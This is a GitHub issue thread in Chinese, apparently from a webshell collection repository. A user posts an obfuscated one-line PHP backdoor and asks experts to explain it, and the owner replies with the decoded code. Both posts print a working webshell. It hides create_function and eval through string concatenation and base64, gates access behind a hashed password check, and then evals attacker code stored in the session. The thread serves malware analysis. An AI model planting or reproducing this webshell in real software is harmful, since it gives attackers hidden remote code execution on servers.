### ISSUE TITLE
发现一个挺有技术含量的后门，大牛有空分析下

### ISSUE THREAD

**Issue by Sybille2** [JoyChou93/webshell#2]
`<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?>`
其中利用substr(sha1(md5等函数，不懂php的小白表示完全蒙蔽了。

**Comment by JoyChou93** [comment]
我建议你学习下php基本的语法。

格式化后的代码如下。剩下如何利用，自己学习、研究吧。

```php
@session_start();
if (isset($_POST['code'])) {
    (substr(sha1(md5(@$_POST['a'])) , 36) == '222f') && $_SESSION['theCode'] = trim($_POST['code']);
}
if (isset($_SESSION['theCode'])) {
    @eval(base64_decode($_SESSION['theCode']));
}
```
